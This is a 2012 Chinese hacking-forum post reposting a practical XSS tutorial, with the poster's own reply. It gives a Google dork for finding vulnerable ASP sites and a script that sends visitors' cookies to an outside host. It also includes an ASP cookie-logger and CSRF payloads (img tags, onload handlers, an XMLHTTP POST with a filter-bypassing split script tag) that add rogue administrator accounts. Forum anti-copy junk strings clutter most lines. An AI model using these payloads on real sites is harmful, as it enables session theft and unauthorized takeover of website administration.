找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1951|回复: 0
打印 上一主题 下一主题

实战xss漏洞利用

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:08:58 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
前天贴吧一位朋友发了个后台XSS利用的帖子,大家就一起讨论了讨论,原帖为:
  d. P# Z- V8 Y5 H& d, x2 O
& w# x" w  D$ ]' @1 T! Phttp://tieba.baidu.com/f?kz=10690072390 u7 t5 V# q7 b6 F) Z* w

! ?' @" X  q# W$ P/ N; ?& A这个帖子说的只是一个思路,不是很详细,并且说的是利用后台XSS挂马的情况,但是其实在后台挂马一般是不会牵扯到XSS的,只是一个过滤不过滤转换不转换的问题,比如很多带编辑器的后台,都是不过滤不转换在文章中的html代码的,比如eweb,你可以直接编辑发表文章的时候的html代码,这就为挂马、盗cookie提供了很多机会。
2 D) k, s, A9 Y6 h/ R9 g8 w, b
) d8 h( v+ m7 \6 j7 c; |+ d但是,我想说的是,即使是挂马、盗cookie,也是不会使用location这种手法的,因为这样太明显了,一般都是使用普通挂马的手法的,比如iframe、JS等等。) R0 N7 G& _" C2 D0 Y
* W5 _0 p3 t2 p2 G' ~6 E
我在上边的帖子中说作者讲的不是很详细,希望出一个详细点的利用教程,于是今天又一位朋友就发了一个详细些的文章,我这里就发大博客里,让更多需要的朋友看到这篇文章。/ a$ c3 `3 E9 }- v  r7 P
1 i1 r5 A! `% H* u' @# q
这个文章是对XSS的一个很简单的利用,原理很简单,主要用于科普,只是想让朋友们知道,XSS并不是简单的弹个框框玩那么简单的,是有很多利用价值的,在国外,XSS已经被列为网站杀手之一,包括国内的很多大站,大家都把心思放到了防范SQL注入上,相应的对XSS的防范就很少,这也是XSS总是能成功的原因之一。3 @  S5 o7 f2 y: O3 \0 t0 f3 b+ t
" H& m0 q! r2 a0 g, F' A0 J
好了,废话不多说了,一起来看文章吧。1 }& S- J) @0 G4 D# k
+ s, c; |- W; {6 L( ]
-------------------------------------------------------------------
7 [/ S* C7 B" j2 M4 y3 f9 {+ c, s$ ]8 m- E' l% e) y; N- I: ~9 P
首先要找到一个有XXS的站,这里就不整什么大站了,谷歌一下inurl:'Product.asp?BigClassName',搜出来的命中率也比较高。随便找一个,先<script>alert('xxs')</script>一下。呵呵,框框出来了。
" v1 _" o! ~$ _: _( K" W8 A$ G! ]# P  m. O- v0 I* y7 W
3 v5 t# H/ a, j+ D

! `& f1 \$ _6 W5 p1 o0 b- w再看看自己的Cookie吧,把alert里面的内容换成document.cookie就可以了,如图:6 U  {; A9 \1 Y1 b, ]

* N# q  E- ~; H$ E4 Z* p
8 I# l- H+ Z6 v  b1 X1 _* n2 w% {$ z% _6 U
这里就是要把弹出来框框里的东西收集到我们的记事本里。这里,要玩这个步骤就需要一个你自己的站点,具体思路就是
0 f% ]/ S4 N5 n6 P5 K1:让目标访问已跨站的网址,然后这个网址执行脚本
# I) O# S/ p5 b4 V& J; P3 K6 `& O2:然后跳转到你已经写好专门用来收集Cookie的网址; b8 i: [6 Y* K( P6 d
- K5 L' g; D9 B+ [8 M
具体实现方法:
9 g9 J7 [* z% Z2 k0 \2 b先构造语句<script>window.open('http://dlgyi.rrvv.net/cookie.asp?msg='+document.cookie)</script># H5 U3 `. Z4 k# v2 o9 s
这句话意思是打开一个新的窗口,访问http://dlgyi.rrvv.net/cookie.asp这个网址,并且通过msg传递一个变量,这里的变量就是我们要收集的cookie了。
  O/ }/ h5 y' g" f
# D% p" d% S6 D. M这里需要自己写一个页面,也就是收集对方发过来cookie的页面,代码是这样的:
8 r8 s  s5 ^; Y' `( T" {! F7 @6 L. f. |2 D; q
<html>
& j% R" m. M/ d. {2 O% }<title>xx</title>9 _4 O& Y2 C* b, }2 z& T
<body>
' ?5 f8 K, W! E( u) r<%4 `( H5 l0 L+ o) i6 g5 f& k  Y
testfile = Server.MapPath("code.txt") //先构造一个路径,也就是取网站根目录,创造一个在根目录下的code.txt路径,保存在testfile中
+ z: q! ^9 [9 `. g. _/ Cmsg = Request("msg")   //获取提交过来的msg变量,也就是cookie值4 D8 e8 z! F" J' X9 N. z. u  L
set fs = server.CreateObject("scripting.filesystemobject")创建一个fs对象" [% ]7 m: v. Q3 Z
set thisfile = fs.OpenTextFile(testfile,8,True,0)' U4 n( o: W( s. e- ?. ?  W
thisfile.WriteLine(""&msg&"")//像code.txt中写入获取来的cookie& H1 i( P9 G+ J* s7 _
thisfile.close   //关闭
5 O9 g) o2 }- k0 j, s/ K; [set fs = nothing  U8 m8 P$ Y; b- F6 K- E
%>
+ b& Y# P' |+ a6 b7 y& d% Q  w. {( B</body>/ e9 K, t7 J! i1 c7 k. U/ U& e
</html>6 b9 q; C: r! \7 m
/ P# E1 h# }0 v$ j3 C7 K+ m$ j3 U4 `. g
然后保存,放在你自己服务器上,如果有人点击构造好的XXS页面,就会自动在你网站的根目录生成一个文本:5 `7 h2 b% u1 H1 f
! i$ H. S+ A0 c4 Y7 T$ k

. j: _9 K4 D5 b/ V4 u
% j, a: Y, g/ M" l' Y3 c% G' s& `! l
, \# B( B9 P8 t. L拿出来看看,呵呵,Cookie到手:# C3 t; |/ t5 Y; z6 s; M: Y' P
7 h1 n, D  R6 d# N( r

9 V* i8 L+ |( r" I% p8 |: z. j4 U' E. h. c+ V& k
本文只是抛砖引玉,而且没有多大的实战价值,一来很多网站都过滤掉了+号这个字符连接符,二来稍大点的站,也不会存在如此的XXS,本文旨在给新手一个练习的向导,毕竟不可能谁一开始学习就可以RI掉大站,从小站开始练手,一起进步。话说咱也是新手O(∩_∩)O~: @) ^# |1 N4 U* Q% i
6 u0 e* d# J; L' L( ~" k, q
PS:一点小提示,如果提交<script>alert('xxs')</script>网站没有反应时,不要立刻就点X。你可以鼠标右击,查看一下网站的源码,看看网站到底过滤掉了什么字符,通过编码啊神马的发挥下智慧,绕过过滤。只要出现小框框,咱就胜利了。9 }& v8 U' ?1 Y
0 T9 o1 S, {1 I9 o* k3 |( y0 H
-------------------------------------------------------------------
! t+ C. x- g- i+ B7 H
- \0 k' K, A. f3 Z9 z) _& }* y# y下面是我对这个帖子的回复,也一起贴过来吧:
* y, S, T* R6 H) U5 f! H  E: T/ {; P7 Q: n: f2 Y9 Q0 c, {
说实话,像这种后台XSS其实作用不大的,一般的小站你拿到cookie也没什么利用价值,大点的站的话,或许可以用cookie盗点装备什么的,但那牵扯的多了,不过对于普通脚本小子来说,日站的时候除非毫无办法了还会想到XSS的,不过日站时候的XSS利用方法跟这篇文章里讲的差不多的,可以借鉴一下。
2 f' p, d+ L8 Q; ^6 u+ s
$ O6 u! j4 x) F; }但是,这里的文章讲的是针对已经进入后台、拿shell无望又想多获得点东西的情况,说它鸡肋的原因是,你知道的,现在大部分站都是cookie+session的,并且一般用户名和密码不会直接放到cookie里了,这是它鸡肋的原因。
# E5 Q7 H6 N  b. e) X4 R: c0 A4 M再者,日站的时候盗cookie一般是想进后台,但是如果遇到网上有源码的情况的话,还可以进一步利用,比如添加个管理员什么的。
) v+ I& E7 _) W. [
4 c: l2 D* w& T) m( L" _在文章的最后,顺便贴上一般XSS的利用思路,也不是原创,原文链接:& t+ ^6 }& ^0 H

( I9 @& p9 T  d- j5 Z0 U7 dhttp://user.qzone.qq.com/673116767/blog/1252452536
4 Q" L+ }: @! J: r- `- l
6 @( X, @* U0 `7 {0 x一般发现一个xss漏洞后要做的基本上就是这些:
. @: V5 T: W! O3 p' [( k4 X
# }+ o! m% K- j+ b1.  伪造请求  使用$_REQUEST或$_GET
* \* g" P$ c3 U2 h2 N$ Z& R& R
* q+ V! l" X. ^3 L0 z9 z# V首先我们要找找该网站使用的程序是不是在网上能找到源码,如果能找到源码的话,就去分析后台管理员更改密码或者增加管理员的页面,然后分析管理员使用的是不是$_REQUEST接收参数,如果是的话,我们使用该XSS漏洞构造一个请求,比如前台发表留言中可以使用HTML代码,那么我们就嵌入一个IMG元素:8 R; ^- l9 p7 m/ c7 I
<img src="/admin/admin_add.asp?name=xxx&psd=yyy" />
+ R5 J' t* L. ~* |  [& |' }" x$ C) O, S- j当管理员登录管理后台后看到包含img的页面的时候,就伪造了一个增加后台管理员的请求,而该请求是由管理员发出的,所以顺利的增加了一个新的管理员。
! L7 l: N: d1 m6 d6 C" r
; _+ F: V9 y* |  I如果是可视文本编辑器,可以尝试使用输入:
' B+ B) _% M  U$ |/ x, phttp://www.drvfan.com/xxx.jpg" onload="window.open('/admin/admin_add.asp?name=xxx&psd=yyy')
* v. B9 j6 ]' S7 s, _这样最终会构造出:
, |, r2 o" V' x7 ]<img src="http://www.drvfan.com/xxx.jpg" onload="window.open('/admin/admin_add.asp?name=xxx&psd=yyy',0,0)" />& j, o3 ?% q. l- B7 d* l7 `2 S! u' M
总之要举一反三。8 E, [. z( ~, R+ m& ]  e) L' V) {

* t; n- q% m0 ?2. 伪造请求  使用$_POST
. m" i# m# I3 Q: s$ {! K6 h1 X
( [! z9 T$ z5 b; m6 D, a/ t当后台接收增加管理员或更改管理密码的变量时使用的是$_POST方式,那么第一种方法无效,我们视情况而定,如果没有过滤<script>,我们可以通过ajax方式来伪造请求,如:! _/ M$ d/ t! Z3 X7 A5 o
<sc/*xss*/ript type="text/javascript">
: n  q9 L8 n; x9 T9 y& Qvar aj = new ActiveXObject("MSXML2.XMLHTTP.3.0");7 D0 K" F6 ~! A6 y# D" T/ o
aj.open("POST", "/admin/admin_add.asp", false);
( K: ^1 |4 A  k, i$ `' }# yvar postdata = 'name=xxx&psd=yyy';6 w  {' E7 K: i
aj.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
1 A- L, i4 t4 w. U& x: n7 h- }* Oaj.send(postdata);% }( O6 Y' o2 A9 ], U: P
</scr/*xss*/ipt>* N, s$ `! N/ B3 b
/*xss*/是HTML注释,用来绕过简单的对script代码块的过滤。
3 j7 Q1 s+ a* Z
0 ^4 d/ m) V- J& ]$ N. \3. 跨站伪造请求 使用$_GET 或 $_REQUEST
- K3 {+ Y1 w+ {6 R, ~0 Z
2 `, P0 a$ v  i/ J% _与第一种伪造请求的方式相似,但是第一种伪造请求是利用站内的xss漏洞进行的,而跨站伪造请求,是站外发起的,比如我在我的博客的首页放了这样一个图片- d( u2 S* w' Z$ G- x, P' P: ]4 Q. z
<img src="http://www.drvfan.com/admin/admin_add.asp?user=xxx&psd=yyy"/>$ T+ b& t; _4 N9 ]) c# f4 ]
然后我跑到dvbbs上发帖子,“勾引”动网论坛的管理员来我的博客,如果动网论坛的管理员已经登录了他的管理后台,然后使用共享进程的浏览器(目前基于ie内核的myie,maxton等等还有firefox都是共享进程的)来访问我的博客,那么他的后台就会被加入一个用户。! I! w8 w3 f9 D8 p' P

; s2 O7 N5 H& m4.跨站伪造请求 使用$_POST(0day)! _* G; q. \% \# v
/ e: d* t  x' S* P* N  ~! g" p
如果入侵目标的管理后台使用的是$_POST方式来接受变量,那么我们无法在我们的网站跨站使用ajax的post方式提交数据过去,因为ajax是无法跨域的。1 h6 D) W) a: A4 T

. A4 }/ A1 Q7 s( }但是我们可以在我们的网站放一个form,里面填写好数据,form的action为要利用的有漏洞的页面,然后当有人打开该页面的时候,我们就用js控制该form进行submit,ajax虽然不能跨域,但向域之外的地址提交form总是可以的。3 j' Y- W8 }- c4 T* v! Y# x3 W1 W2 c

  G& V: q, y6 G; J8 a$ K总之,第3,4种方法成功几率要小一些,因为我们要想办法让已经登录自身后台的管理员,使用共享session的浏览器访问我们的伪造请求的页面,有一点社会工程学的技术含量。9 h6 G$ E7 K# ^! M

& J, n. y, g& A6 ?* POK,该说的都说完了,Over。
# n) W8 O# U) O
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表